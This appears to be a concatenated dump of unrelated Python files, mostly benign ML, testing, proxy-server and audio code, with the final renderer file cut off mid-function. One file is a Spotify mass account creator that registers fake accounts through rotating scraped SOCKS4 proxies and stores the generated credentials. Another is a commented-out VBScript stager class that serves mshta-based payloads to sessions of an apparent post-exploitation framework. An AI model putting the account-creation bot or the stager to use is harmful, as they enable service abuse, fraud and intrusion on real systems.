os.makedirs(a.output_dir)
for k, v in a._get_kwargs():
print(k, "=", v)
with open(os.path.join(a.output_dir, "options.json"), "w") as f:
f.write(json.dumps(vars(a), sort_keys=True, indent=4))
hyp = HyperParams(a.lr, a.beta1, a.l1_weight, a.gan_weight, a.ngf, a.ndf, a.conv_std, a.enable_quantization)
with open(os.path.join(a.output_dir, "hyper_params.json"), "w") as f:
f.write(json.dumps(hyp._asdict(), sort_keys=True, indent=4))
return a, hyp
def main():
initRand()
a, hyper_params = processArgs()
examples = load_examples(input_dir=a.input_dir, batch_size=a.batch_size, is_training=True)
print("examples count = %d" % examples.count)
# inputs and targets are [batch_size, height, width, channels]
model = create_model(
inputs = examples.inputs,
targets = examples.targets,
hyper_params = hyper_params,
is_training = True,
is_fused = True
)
inputs = examples.inputs
targets = examples.targets
outputs = model.outputs
with tf.name_scope("encode_images"):
display_fetches = {
"paths": examples.paths,
"inputs": inputs,
"targets": targets,
"outputs": outputs,
}
tf.summary.scalar("discriminator_loss", model.discrim_loss)
tf.summary.scalar("generator_loss_GAN", model.gen_loss_GAN)
tf.summary.scalar("generator_loss_L1", model.gen_loss_L1)
for var in tf.trainable_variables():
tf.summary.histogram(var.op.name + "/values", var)
for grad, var in model.discrim_grads_and_vars + model.gen_grads_and_vars:
tf.summary.histogram(var.op.name + "/gradients", grad)
with tf.name_scope("parameter_count"):
parameter_count = tf.reduce_sum([tf.reduce_prod(tf.shape(v)) for v in tf.trainable_variables()])
server = tf.train.Server.create_local_server()
saver = tf.train.Saver(max_to_keep=64)
tensors_to_log = {
"d_loss": "discriminator_loss/discrim_loss",
"g_loss_GAN":"generator_loss/gen_loss_GAN",
"g_loss_L1":"generator_loss/gen_loss_L1",
"global_step":"global_step"
}
logging_hook = tf.train.LoggingTensorHook(tensors=tensors_to_log, every_n_iter=a.progress_freq)
max_steps = examples.steps_per_epoch * a.max_epochs
summary_op = tf.summary.merge_all()
hooks = [
tf.train.StopAtStepHook(num_steps=max_steps),
tf.train.CheckpointSaverHook(save_steps=a.save_freq,checkpoint_dir=a.output_dir,saver=saver),
tf.train.SummarySaverHook(save_steps=a.summary_freq, summary_op=summary_op),
logging_hook,
tf.train.StepCounterHook(every_n_steps=a.progress_freq),
SaveImageHook(output_dir=a.output_dir, fetches=display_fetches, save_steps=a.save_freq),
ProgressLoggingHook(log_steps=a.progress_freq, max_steps=max_steps)
]
global_step = tf.train.get_or_create_global_step()
get_global_step = tf.train.get_global_step()
if(a.checkpoint is not None):
ckpt = tf.train.get_checkpoint_state(a.checkpoint)
if ckpt:
last_model = ckpt.model_checkpoint_path
print("start with existing checkpoint ", ckpt.model_checkpoint_path)
else:
print("error no checkpoint found")
exit(1)
scaffold = None
else:
init_op=tf.group(tf.global_variables_initializer(), tf.local_variables_initializer())
scaffold = tf.train.Scaffold(init_op)
print("start from no checkpoint")
with tf.train.MonitoredTrainingSession(master=server.target,
config=tf.ConfigProto(allow_soft_placement=True),
is_chief=True,
scaffold = scaffold,
checkpoint_dir = a.checkpoint,
hooks=hooks) as sess:
coord = tf.train.Coordinator()
threads = tf.train.start_queue_runners(sess=sess, coord=coord)
try:
while not sess.should_stop():
out = sess.run(model)
except tf.errors.OutOfRangeError:
print('Done training -- epoch limit reached')
finally:
coord.request_stop()
coord.join(threads)
main()
|
11547011
|
from django.views.decorators.csrf import csrf_exempt
from canvas.exceptions import NotLoggedIntoFacebookError
from canvas.shortcuts import r2r
from canvas.util import get_fb_api
@csrf_exempt
def facebook_iframe(request):
fb_message_id = request.GET.get('request_ids')
try:
fb_user, fb = get_fb_api(request)
app_requests = fb.request('{}/apprequests'.format(fb_user['id']))
redirect_url = None
for app_request in app_requests['data']:
if not redirect_url:
redirect_url = app_request.get('data')
fb.delete_object(app_request['id'])
if not redirect_url:
redirect_url = '/'
except NotLoggedIntoFacebookError:
redirect_url = '/'
context = {
'request': request,
'fb_message_id': fb_message_id,
'redirect_url': redirect_url,
}
resp = r2r('facebook_app/facebook_iframe.django.html', context)
resp.set_cookie('fb_message_id', fb_message_id)
return resp
|
11547037
|
import platform
import random
import string
import threading
import time
from os import system
import requests
if platform.system() == "Windows": # checking OS
title = "windows"
else:
title = "linux"
def randomName(size=10, chars=string.ascii_letters + string.digits):
return ''.join(random.choice(chars) for i in range(size))
def randomPassword(size=14, chars=string.ascii_letters + string.digits):
return ''.join(random.choice(chars) for i in range(size))
global maxi
global created
created = 0
errors = 0
class proxy():
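    # Scrapes a fresh SOCKS4 proxy list every 10 minutes on a background thread
    # and serves random entries formatted for requests.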
def update(self):
while True:
data = ''
urls = ["https://api.proxyscrape.com/?request=getproxies&proxytype=socks4&timeout=10000&ssl=yes"]
for url in urls:
data += requests.get(url).text
self.splited += data.split("\r\n") #scraping and splitting proxies
time.sleep(600)
def get_proxy(self):
random1 = random.choice(self.splited) #choose a random proxie
return random1
def FormatProxy(self):
proxyOutput = {'https' :'socks4://'+self.get_proxy()}
return proxyOutput
def __init__(self):
self.splited = []
threading.Thread(target=self.update).start()
time.sleep(3)
proxy1 = proxy()
def creator():
global maxi
global created
global errors
while maxi > created:
if title == "windows":
system("title "+ f"Spotify Account Creator by KevinLage https://github.com/KevinLage/Spotify-Account-Creator Created: {created}/{maxi} Errors:{errors}")
s = requests.session()
email = randomName()
password = <PASSWORD>()
data={
"displayname":"Josh",
"creation_point":"https://login.app.spotify.com?utm_source=spotify&utm_medium=desktop-win32&utm_campaign=organic",
"birth_month":"12",
"email":email + <EMAIL>",
"password":password,
"creation_flow":"desktop",
"platform":"desktop",
"birth_year":"1991",
"iagree":"1",
"key":"<KEY>",
"birth_day":"17",
"gender":"male",
"password_repeat":password,
"referrer":""
}
try:
r = s.post("https://spclient.wg.spotify.com/signup/public/v1/account/",data=data,proxies=proxy1.FormatProxy())
if '{"status":1,"' in r.text:
open("created.txt", "a+").write(email + "@<EMAIL>:" + password + "\n")
created += 1
if title == "windows":
system("title "+ f"Spotify Account Creator : {created}/{maxi} Errors:{errors}")
else:
errors += 1
except:
pass
maxi = int(input("How many accounts do you want to create?\n"))
maxthreads = int(input("How many Threads?\n"))
num = 0
while num < maxthreads:
num += 1
threading.Thread(target=creator).start() # Start Checking Thread
|
11547050
|
import shlex
import subprocess
import os
import re
import sys
import global_params
import argparse
try:
import z3
import z3util
except:
print "Error: Z3 is not available. Please install z3 from https://github.com/Z3Prover/z3."
exit(0)
def cmd_exists(cmd):
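    # True when the command resolves in the shell (checked with the `type` builtin).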
return subprocess.call("type " + cmd, shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE) == 0
def main():
# TODO: Implement -o switch.
parser = argparse.ArgumentParser()
parser.add_argument("source", type=str, help="Solidity file name by default, bytecode if -e is enabled. Use stdin to read from stdin.")
parser.add_argument("-b", "--bytecode", help="read bytecode in source instead of solidity file.", action="store_true")
parser.add_argument("-j", "--json", help="Redirect results to a json file.", action="store_true")
parser.add_argument("-e", "--evm", help="Do not remove the .evm file.", action="store_true")
parser.add_argument("-p", "--paths", help="Print path condition information.", action="store_true")
parser.add_argument("--error", help="Enable exceptions and print output. Monsters here.", action="store_true")
parser.add_argument("-t", "--timeout", type=int, help="Timeout for Z3.")
parser.add_argument("-d", "--debug", help="Enable debug .log file.", action="store_true")
parser.add_argument("-v", "--verbose", help="Verbose output, print everything.", action="store_true")
parser.add_argument("-r", "--report", help="Create .report file.", action="store_true")
args = parser.parse_args()
if args.timeout:
global_params.TIMEOUT = args.timeout
global_params.PRINT_PATHS = 1 if args.paths else 0
global_params.PRINT_MODE = 1 if args.verbose else 0
global_params.REPORT_MODE = 1 if args.report else 0
global_params.DEBUG_MODE = 1 if args.debug else 0
global_params.IGNORE_EXCEPTIONS = 1 if args.error else 0
if not cmd_exists("disasm"):
print "disasm is missing. Please install go-ethereum and make sure disasm is in the path."
return
if args.bytecode:
disasm_out = ""
try:
disasm_p = subprocess.Popen(shlex.split('disasm'), stdout=subprocess.PIPE, stdin=subprocess.PIPE)
disasm_out = disasm_p.communicate(input=open(args.source).read())[0]
except:
print "Disassembly failed."
# Run symExec
with open(args.source+'.disasm', 'w') as of:
of.write(disasm_out)
# TODO: Do this as an import and run, instead of shell call and hacky fix
os.system('python symExec.py %s.disasm %d %d %d %d %d %d %d %d %d %d %s' % (args.source, global_params.IGNORE_EXCEPTIONS, global_params.REPORT_MODE, global_params.PRINT_MODE, global_params.DATA_FLOW, global_params.DEBUG_MODE, global_params.CHECK_CONCURRENCY_FP, global_params.TIMEOUT, global_params.UNIT_TEST, global_params.GLOBAL_TIMEOUT, global_params.PRINT_PATHS, args.source+".json" if args.json else ""))
os.system('rm %s.disasm' % (args.source))
return
if not cmd_exists("solc"):
print "solc is missing. Please install the solidity compiler and make sure solc is in the path."
return
# Compile first
solc_cmd = "solc --optimize --bin-runtime %s"
FNULL = open(os.devnull, 'w')
solc_p = subprocess.Popen(shlex.split(solc_cmd % args.source), stdout = subprocess.PIPE, stderr=FNULL)
solc_out = solc_p.communicate()
for (cname, bin_str) in re.findall(r"\n======= (.*?) =======\nBinary of the runtime part: \n(.*?)\n", solc_out[0]):
print "Contract %s:" % cname
bin_str += "\0"
disasm_out = ""
try:
disasm_p = subprocess.Popen(shlex.split('disasm'), stdout=subprocess.PIPE, stdin=subprocess.PIPE)
disasm_out = disasm_p.communicate(input=bin_str)[0]
except:
print "Disassembly failed."
# Run symExec
with open(cname+'.evm.disasm', 'w') as of:
of.write(disasm_out)
# TODO: Do this as an import and run, instead of shell call and hacky fix
os.system('python symExec.py %s.evm.disasm %d %d %d %d %d %d %d %d %d %d %s' % (cname, global_params.IGNORE_EXCEPTIONS, global_params.REPORT_MODE, global_params.PRINT_MODE, global_params.DATA_FLOW, global_params.DEBUG_MODE, global_params.CHECK_CONCURRENCY_FP, global_params.TIMEOUT, global_params.UNIT_TEST, global_params.GLOBAL_TIMEOUT, global_params.PRINT_PATHS, cname+".json" if args.json else ""))
if args.evm:
with open(cname+'.evm','w') as of:
of.write(bin_str)
os.system('rm %s.evm.disasm' % (cname))
if __name__ == '__main__':
main()
|
11547076
|
import time
import langid
import sys
import io
testData = []
totBytesUnicode = 0
totBytesUTF8 = 0
f = io.open(sys.argv[1], 'r', encoding='utf-8')
while True:
line = f.readline()
if line == '':
break
idx = line.find('\t')
if idx == -1:
continue
test = line[idx+1:].strip()
totBytesUnicode += len(test)
utf8 = test.encode('utf-8')
totBytesUTF8 += len(utf8)
testData.append(utf8)
print 'Tot bytes %s vs %s' % (totBytesUnicode, totBytesUTF8)
best = -1
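# Run the classification pass 10 times and keep the fastest wall-clock time.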
for i in range(10):
answers = []
t0 = time.time()
for test in testData:
#answers.append(langid.classify(test)[0])
langid.classify(test)
t = time.time() - t0
print '%.1f msec' % (1000*t)
if best == -1 or t < best:
best = t
print ' **'
print 'Best %.1f msec; totBytes=%d MB/sec=%.1f' % \
      (1000*best, totBytesUTF8, totBytesUTF8/1024./1024./best)
|
11547093
|
import pytest
from panini.async_test_client import AsyncTestClient
def run_panini():
from tests.async_test_client.separate_file.main import app
app.start()
@pytest.fixture
async def client():
client = await AsyncTestClient(run_panini).start()
yield client
await client.stop()
@pytest.mark.asyncio
async def test_request(client: AsyncTestClient):
subject = "separate_file.async_test_client.listen_request"
response = await client.request(subject, {})
assert response["success"] is True
assert response["message"] == subject
|
11547100
|
import os
import sys
import core.stager
from core.payload import Payload
import random
"""
class VBScriptStager(core.stager.Stager):
NAME = "VBScript Stager"
DESCRIPTION = "Listens for new sessions, using VBScript for payloads"
AUTHORS = ['RiskSense, Inc.']
# the type of job payloads
WORKLOAD = "vbs"
def run(self):
payloads = []
payloads.append(Payload("In Memory (Windows 2000 SP3+)", self.load_file("data/stager/vbscript/mshta.cmd")))
payloads.append(Payload("On Disk (All Windows)", self.load_file("data/stager/vbscript/disk.cmd")))
self.start_server(payloads)
def stage(self, server, handler, session, options):
script = self.load_script("data/stager/vbscript/work.vbs", options, True, False)
handler.reply(200, script)
def job(self, server, handler, session, job, options):
script = self.load_script("data/stager/vbscript/job.vbs", options)
handler.reply(200, script)
"""
|
11547192
|
import numpy as np
import pandas as pd
from torch.utils.data import DataLoader
from model.unet import UNet
from train_util import CarvanaSegmenationTest
from datasets import CarvanaTestDataset
from config import *
def main():
df_test = pd.read_csv(DATA_ROOT / 'sample_submission.csv')
ids_test = df_test['img'].map(lambda s: s.split('.')[0])
test_dataset = CarvanaTestDataset(ids_test.values)
test_loader = DataLoader(test_dataset, shuffle=False, batch_size=TEST_BATCH_SIZE)
classifier = CarvanaSegmenationTest(net = UNet(), pred_folder = str(PREDICTIONS_DIR))
classifier.predict(test_loader)
if __name__ == '__main__':
main()
|
11547203
|
import random
import torch
from .base_model import BaseModel
from .generator import Generator
from .discriminator import BaseDiscriminator
from .layers.helpers import initialize_model, data_parallel
from .losses.perceptual_loss import PerceptualLoss
from .losses.ssim_loss import SSIMLoss
from .transform.point_sampler import sample_uniformly, sample_normally
class CORNModel(BaseModel):
def name(self):
return 'CORNModel'
def initialize(self, opt):
BaseModel.initialize(self, opt)
self.device = opt.device
self.points_3d = None
# specify the training loss names
self.loss_names = self.get_loss_names()
# specify the images you want to save/display. The program will call base_model.get_current_visuals
self.visual_names = []
for ii in range(opt.num_views):
self.visual_names += [f'src_{ii}', f'src_{ii}_rec', f'src_{ii}_pred', f'src_{ii}_mask', f'src_{ii}_mask_rec', f'src_{ii}_mask_pred']
self.visual_names += ['tgt', 'tgt_0_pred','tgt_1_pred', 'tgt_mask', 'tgt_0_mask_pred', 'tgt_1_mask_pred']
# specify the models you want to save to the disk. The program will call base_model.save_networks and base_model.load_networks
if opt.isTrain and opt.lambda_GAN > 0.0:
self.model_names = ['G_NVS', 'D_NVS']
else:
self.model_names = ['G_NVS']
# Define the Generator network
self.netG_NVS = Generator(opt=opt)
self.netG_NVS = initialize_model(self.netG_NVS, opt)
self.netG_NVS = data_parallel(self.netG_NVS, self.opt)
# Define the Discriminator network
if opt.phase == 'train':
if opt.lambda_GAN > 0.0:
self.netD_NVS = BaseDiscriminator(opt)
self.netD_NVS = initialize_model(self.netD_NVS, opt)
self.netD_NVS = data_parallel(self.netD_NVS, self.opt)
# define loss functions
self.criterion_BCE = data_parallel(torch.nn.BCELoss(), opt)
self.criterion_L1 = data_parallel(torch.nn.L1Loss(), opt)
self.criterion_SSIM = data_parallel(SSIMLoss(), opt)
if opt.lambda_VGG > 0.0:
self.criterion_VGG = data_parallel(PerceptualLoss(), opt)
# initialize the optimizers
self.optimizer_G = torch.optim.Adam(self.netG_NVS.parameters(), lr=opt.lr, betas=(opt.beta1, 0.999))
self.optimizers = {}
self.optimizers['optimizer_G'] = self.optimizer_G
if opt.lambda_GAN > 0.0:
self.optimizer_D = torch.optim.Adam(self.netD_NVS.parameters(), lr=opt.lr, betas=(opt.beta1, 0.999))
self.optimizers['optimizer_D'] = self.optimizer_D
# Lambda factors
self.lambda_L1 = opt.lambda_L1
self.lambda_VGG = opt.lambda_VGG
self.lambda_GAN = opt.lambda_GAN
self.lambda_3D = opt.lambda_3D
self.lambda_SSIM = opt.lambda_SSIM
self.lambda_BCE = opt.lambda_BCE
self.lambda_TGT = opt.lambda_TGT
def set_input(self, input):
# Transfer data to device
self.src_0 = input['src_0'].to(self.device)
self.src_0_mask = input['src_0_mask'].to(self.device)
self.src_0_cam_pose = input['src_0_cam_pose'].to(self.device)
self.src_1 = input['src_1'].to(self.device)
self.src_1_mask = input['src_1_mask'].to(self.device)
self.src_1_cam_pose = input['src_1_cam_pose'].to(self.device)
self.tgt = input['tgt'].to(self.device)
self.tgt_mask = input['tgt_mask'].to(self.device)
self.tgt_cam_pose = input['tgt_cam_pose'].to(self.device)
def sample_points(self, batch_size):
if self.opt.point_sampling == 'uniform':
return sample_uniformly(self.opt.num_points, batch_size=batch_size)
else:
return sample_normally(self.opt.num_points, batch_size=batch_size)
def forward(self, points=None):
# Either receive 3D points or sample them
self.points_3d = self.sample_points(self.src_0.shape[0]).to(self.device) if points is None else points.to(self.device)
output = self.netG_NVS(self.src_0, self.src_0_cam_pose, self.tgt_cam_pose, self.points_3d)
self.tgt_0_pred = output['novel_views']
self.tgt_0_mask_pred = output['novel_masks']
self.src_0_feat = output['3D_features']
def backward_G(self):
# Decode source 0 features to get src_1 prediction
output = self.netG_NVS(None, None, self.src_1_cam_pose, self.points_3d, self.src_0_feat,
'decode')
self.src_1_rec, self.src_1_mask_rec = output['novel_views'], output['novel_masks']
# Source 1 to target
output = self.netG_NVS(self.src_1, self.src_1_cam_pose, self.tgt_cam_pose, self.points_3d)
self.tgt_1_pred = output['novel_views']
self.tgt_1_mask_pred = output['novel_masks']
self.src_1_feat = output['3D_features']
        # Decode source 1 features to get src_0 prediction
output = self.netG_NVS(None, None, self.src_0_cam_pose, self.points_3d, self.src_1_feat,
'decode')
self.src_0_rec, self.src_0_mask_rec = output['novel_views'], output['novel_masks']
        # Transformation chain src0 -> tgt -> src1
output = self.netG_NVS(self.tgt_0_pred, self.tgt_cam_pose, self.src_1_cam_pose, self.points_3d)
self.src_1_pred = output['novel_views']
self.src_1_mask_pred = output['novel_masks']
self.tgt_0_feat = output['3D_features']
        # Transformation chain src1 -> tgt -> src0
output = self.netG_NVS(self.tgt_1_pred, self.tgt_cam_pose, self.src_0_cam_pose, self.points_3d)
self.src_0_pred = output['novel_views']
self.src_0_mask_pred = output['novel_masks']
self.tgt_1_feat = output['3D_features']
# Compute all the losses
zero_loss = torch.zeros(1).to(self.device)
self.loss_G_L1 = zero_loss if self.lambda_L1 <= 0 else \
self.criterion_L1(self.src_0_rec, self.src_0).mean() + \
self.criterion_L1(self.src_1_rec, self.src_1).mean() + \
self.criterion_L1(self.src_0_pred, self.src_0).mean() + \
self.criterion_L1(self.src_1_pred, self.src_1).mean()
# Occupancy loss
self.loss_G_BCE = zero_loss if self.lambda_BCE <= 0 else \
self.criterion_BCE(self.src_0_mask_rec, self.src_0_mask).mean() + \
self.criterion_BCE(self.src_1_mask_rec, self.src_1_mask).mean() + \
self.criterion_BCE(self.src_0_mask_pred, self.src_0_mask).mean() + \
self.criterion_BCE(self.src_1_mask_pred, self.src_1_mask).mean()
# SSIM Loss
self.loss_G_SSIM = zero_loss if self.lambda_SSIM <= 0 else \
self.criterion_SSIM(self.src_0_rec, self.src_0).mean() + \
self.criterion_SSIM(self.src_1_rec, self.src_1).mean() + \
self.criterion_SSIM(self.src_0_pred, self.src_0).mean() + \
self.criterion_SSIM(self.src_1_pred, self.src_1).mean()
# Feature loss
self.loss_G_3D = zero_loss if self.lambda_3D <= 0 else \
self.criterion_L1(self.tgt_0_feat, self.src_0_feat).mean() + \
self.criterion_L1(self.tgt_0_feat, self.src_1_feat).mean() + \
self.criterion_L1(self.tgt_1_feat, self.src_0_feat).mean() + \
self.criterion_L1(self.tgt_1_feat, self.src_1_feat).mean() + \
self.criterion_L1(self.src_0_feat, self.src_1_feat).mean() + \
self.criterion_L1(self.tgt_1_feat, self.tgt_0_feat).mean()
# GAN loss
self.loss_G_GAN = zero_loss if self.lambda_GAN <= 0 else \
self.netD_NVS(self.tgt_0_pred, self.src_0, mode='generator')['Sum'].mean() + \
self.netD_NVS(self.tgt_1_pred, self.src_1, mode='generator')['Sum'].mean()
# Perceptual Loss
self.loss_G_VGG = zero_loss if self.lambda_VGG <= 0 else \
self.criterion_VGG(self.src_0_rec, self.src_0).mean() + \
self.criterion_VGG(self.src_1_rec, self.src_1).mean() + \
self.criterion_VGG(self.src_0_pred, self.src_0).mean() + \
self.criterion_VGG(self.src_1_pred, self.src_1).mean()
# Target consistency loss
self.loss_G_TGT = zero_loss if self.lambda_TGT <= 0 else \
self.criterion_L1(self.tgt_0_pred, self.tgt_1_pred).mean()
self.loss_G = self.lambda_L1 * self.loss_G_L1 + self.lambda_3D * self.loss_G_3D \
+ self.lambda_SSIM * self.loss_G_SSIM + self.lambda_BCE * self.loss_G_BCE\
+ self.lambda_VGG * self.loss_G_VGG + self.lambda_GAN * self.loss_G_GAN \
+ self.lambda_TGT * self.loss_G_TGT
self.loss_G.backward()
def backward_D(self):
self.loss_D = self.netD_NVS(self.tgt_0_pred, self.src_0, mode='discriminator')['Sum'].mean() +\
self.netD_NVS(self.tgt_1_pred, self.src_1, mode='discriminator')['Sum'].mean()
self.loss_D.backward()
def optimize_parameters(self):
self.forward()
# Optimize the Generator
if self.lambda_GAN > 0.0:
self.set_requires_grad([self.netD_NVS], False)
self.optimizer_G.zero_grad()
self.backward_G()
self.optimizer_G.step()
# Optimize the Discriminator
if self.lambda_GAN > 0.0:
self.set_requires_grad([self.netD_NVS], True)
self.optimizer_D.zero_grad()
self.backward_D()
self.optimizer_D.step()
# Helper function to compute validation error on batch
def validate(self, input):
with torch.no_grad():
            self.src_0 = input['src_0'].to(self.device)
            self.src_0_cam_pose = input['src_0_cam_pose'].to(self.device)
            self.tgt_0 = input['tgt'].to(self.device)
            self.tgt_cam_pose = input['tgt_cam_pose'].to(self.device)
self.forward()
return self.criterion_L1(self.tgt_0_pred, self.tgt_0).mean()
# used in test time, wrapping `forward` in no_grad() so we don't save
# intermediate steps for backprop
def test(self, input):
self.src_0 = input['src_0'].to(self.device)
self.src_0_mask = input['src_0_mask'].to(self.device)
self.src_0_cam_pose = input['src_0_cam_pose'].to(self.device)
self.tgt = input['tgt'].to(self.device)
self.tgt_mask = input['tgt_mask'].to(self.device)
self.tgt_cam_pose = input['tgt_cam_pose'].to(self.device)
with torch.no_grad():
self.forward()
|
11547205
|
import datetime
import copy
import pytest
from tempora.schedule import DelayedCommand, now
from pmxbot.core import AtHandler, Scheduled, command, Handler
class DelayedCommandMatch:
def __eq__(self, other):
return isinstance(other, DelayedCommand)
@pytest.fixture
def patch_scheduled_registry(monkeypatch):
"""
Ensure Scheduled._registry is not mutated by these tests.
"""
monkeypatch.setattr(Scheduled, '_registry', [])
@pytest.fixture
def patch_handler_registry(monkeypatch):
"""
Ensure Handler._registry is not mutated by these tests.
"""
monkeypatch.setattr(Handler, '_registry', [])
@pytest.mark.usefixtures("patch_handler_registry")
class TestCommandHandlerUniqueness:
def test_command_with_aliases(self):
@command(aliases='mc')
def my_cmd():
"help for my command"
assert len(Handler._registry) == 2
        # attempt to re-register both the command and its alias
for handler in Handler._registry:
copy.deepcopy(handler).register()
assert len(Handler._registry) == 2
@pytest.mark.usefixtures("patch_scheduled_registry")
class TestScheduledHandlerUniqueness:
@pytest.fixture
def handler(self):
return AtHandler(
name='some name',
channel='#some-channel',
when=now(),
func=lambda x: x,
doc='some doc',
)
def test_doesnt_schedule_same_command_twice(self, handler):
handler.register()
copy.copy(handler).register()
assert len(Scheduled._registry) == 1
def test_schedules_same_command_if_names_differ(self, handler):
handler.register()
handler2 = copy.copy(handler)
handler2.name = 'other'
handler2.register()
assert len(Scheduled._registry) == 2
def test_schedules_same_command_if_channels_differ(self, handler):
handler.register()
handler2 = copy.copy(handler)
handler2.channel = '#other'
handler2.register()
assert len(Scheduled._registry) == 2
def test_schedules_same_command_if_datetimes_differ(self, handler):
handler.register()
handler2 = copy.copy(handler)
handler2.when = handler.when + datetime.timedelta(days=15)
handler2.register()
assert len(Scheduled._registry) == 2
def test_schedules_same_command_if_docs_differ(self, handler):
handler.register()
handler2 = copy.copy(handler)
handler2.doc = 'other'
handler2.register()
assert len(Scheduled._registry) == 2
|
11547296
|
import errno
import os
import signal
import sys
import threading
import pywf as wf
class Context:
def __init__(self):
pass
cv = threading.Condition()
def Stop(signum, frame):
print("Stop server:", signum)
cv.acquire()
cv.notify()
cv.release()
def reply_callback(proxy_task):
series = wf.series_of(proxy_task)
ctx = series.get_context()
proxy_resp = proxy_task.get_resp()
sz = proxy_resp.get_body_size()
if proxy_task.get_state() == wf.WFT_STATE_SUCCESS:
print(
"{} Success, Http Status:{} Body Length:{}".format(
ctx.url, proxy_resp.get_status_code(), sz
)
)
else:
print(
"{} Reply failed:{} Body Length:{}".format(
ctx.url, os.strerror(proxy_task.get_error()), sz
)
)
def http_callback(t):
state = t.get_state()
error = t.get_error()
resp = t.get_resp()
series = wf.series_of(t)
ctx = series.get_context()
proxy_resp = ctx.proxy_task.get_resp()
if state == wf.WFT_STATE_SYS_ERROR and error == errno.ECONNRESET:
state = wf.WFT_STATE_SUCCESS
if state == wf.WFT_STATE_SUCCESS:
ctx.proxy_task.set_callback(reply_callback)
        # move the content from resp into proxy_resp; resp must not be used after this
resp.move_to(proxy_resp)
if not ctx.is_keep_alive:
proxy_resp.set_header_pair("Connection", "close")
else:
errstr = ""
if state == wf.WFT_STATE_SYS_ERROR:
errstr = "system error: {}".format(os.strerror(error))
elif state == wf.WFT_STATE_DNS_ERROR:
errstr = "DNS error: {}".format(error)
elif state == wf.WFT_STATE_SSL_ERROR:
errstr = "SSL error: {}".format(error)
else:
errstr = "URL error (Cannot be a HTTPS proxy)"
print(
"{} Fetch failed, state:{} error:{} {}".format(
ctx.url, state, error, errstr
)
)
proxy_resp.set_status_code("404")
proxy_resp.append_body(b"<html>404 Not Found.</html>")
def process(t):
req = t.get_req()
series = wf.series_of(t)
ctx = Context()
ctx.url = req.get_request_uri()
ctx.proxy_task = t
series.set_context(ctx)
ctx.is_keep_alive = req.is_keep_alive()
http_task = wf.create_http_task(req.get_request_uri(), 0, 0, http_callback)
req.set_request_uri(http_task.get_req().get_request_uri())
req.move_to(http_task.get_req())
http_task.get_resp().set_size_limit(200 * 1024 * 1024)
series << http_task
def main():
if len(sys.argv) != 2:
print("Usage {} <port>".format(sys.argv[0]))
sys.exit(1)
port = int(sys.argv[1])
signal.signal(signal.SIGINT, Stop)
server_params = wf.ServerParams()
server_params.request_size_limit = 8 * 1024 * 1024
server = wf.HttpServer(server_params, process)
if server.start(port) == 0:
cv.acquire()
cv.wait()
cv.release()
server.stop()
else:
print("Cannot start server")
sys.exit(1)
# Test it: curl -x http://localhost:10086/ http://sogou.com
if __name__ == "__main__":
main()
|
11547300
|
from statsd import StatsClient, TCPStatsClient
from time import sleep
statsd = TCPStatsClient(host='localhost',
port=1111,
prefix=None,
ipv6=False)
for i in range(100000):
statsd.incr('baz')
sleep(0.0001)
statsd.incr('baz')
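# For comparison, the plain UDP client (StatsClient, imported above but unused
# in the original snippet) exposes the same counter API; a minimal sketch,
# assuming a statsd daemon listening on the default UDP port 8125:
udp_statsd = StatsClient(host='localhost', port=8125, prefix=None)
udp_statsd.incr('baz')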
|
11547378
|
from hashlib import md5
from kbinxml import KBinXML
from . import GenericFolder
class MD5Folder(GenericFolder):
def __init__(self, ifs_data, parent, obj, path = '', name = '', supers = None,
super_disable = False, super_skip_bad = False,
super_abort_if_bad = False, md5_tag = None, extension = None):
GenericFolder.__init__(self, ifs_data, parent, obj, path, name, supers,
super_disable, super_skip_bad, super_abort_if_bad)
self.md5_tag = md5_tag if md5_tag else self.name
self.extension = extension
def tree_complete(self):
GenericFolder.tree_complete(self)
self.info_kbin = None
self.info_file = None
for filename, file in self.files.items():
if filename.endswith('.xml'):
self.info_file = file
break
if not self.info_file:
#raise KeyError('MD5 folder contents have no mapping xml')
# _super_ references to info XML breaks things - just extract what we can
return
self.info_kbin = KBinXML(self.info_file.load(convert_kbin = False))
self._apply_md5()
def _apply_md5(self):
# findall needs xpath or it'll only search direct children
names = (tag.attrib['name'] for tag in self.info_kbin.xml_doc.findall('.//' + self.md5_tag))
self._apply_md5_folder(names, self)
def _apply_md5_folder(self, plain_list, folder):
for plain in plain_list:
hashed = md5(plain.encode(self.info_kbin.encoding)).hexdigest()
if self.extension:
plain += self.extension
# add correct packed name to deobfuscated filesystems
if plain in folder.files:
folder.files[plain]._packed_name = hashed
# deobfuscate packed filesystems
if hashed in folder.files:
orig = folder.files.pop(hashed)
orig.name = plain
folder.files[plain] = orig
|
11547407
|
import numpy as np
from .panner import DirectSpeakersPanner
from ..renderer_common import BlockProcessingChannel, InterpretTimingMetadata, FixedGains
from ..track_processor import TrackProcessor
class InterpretDirectSpeakersMetadata(InterpretTimingMetadata):
"""Interpret a sequence of DirectSpeakersTypeMetadata, producing a sequence of ProcessingBlock.
Args:
calc_gains (callable): Called with DirectSpeakersTypeMetadata to calculate per-channel gains.
"""
def __init__(self, calc_gains):
super(InterpretDirectSpeakersMetadata, self).__init__()
self.calc_gains = calc_gains
def __call__(self, sample_rate, block):
"""Yield ProcessingBlock that apply the processing for a given DirectSpeakersTypeMetadata.
Args:
sample_rate (int): Sample rate to operate in.
block (DirectSpeakersTypeMetadata): Metadata to interpret.
Yields:
            One ProcessingBlock object that applies gains for a single input channel.
"""
start_time, end_time = self.block_start_end(block)
start_sample = sample_rate * start_time
end_sample = sample_rate * end_time
gains = self.calc_gains(block)
yield FixedGains(start_sample, end_sample, gains)
class DirectSpeakersRenderer(object):
options = DirectSpeakersPanner.options
@options.with_defaults
def __init__(self, layout, **options):
self._panner = DirectSpeakersPanner(layout, **options)
self._nchannels = len(layout.channels)
# tuples of a track spec processor and a BlockProcessingChannel to
# apply to the samples it produces.
self.block_processing_channels = []
def set_rendering_items(self, rendering_items):
"""Set the rendering items to process.
Note:
Since this resets the internal state, this should normally be called
once before rendering is started. Dynamic modification of the
            rendering items could be implemented through another API.
Args:
rendering_items (list of DirectSpeakersRenderingItem): Items to process.
"""
self.block_processing_channels = [(TrackProcessor(item.track_spec),
BlockProcessingChannel(
item.metadata_source,
InterpretDirectSpeakersMetadata(self._panner.handle)))
for item in rendering_items]
def render(self, sample_rate, start_sample, input_samples):
"""Process n input samples to produce n output samples.
Args:
sample_rate (int): Sample rate.
start_sample (int): Index of the first sample in input_samples.
            input_samples (ndarray of (n, k) float): Multi-channel input sample
block; there must be at least as many channels as referenced in the
rendering items.
Returns:
(ndarray of (n, l) float): l channels of output samples
corresponding to the l loudspeakers in layout.
"""
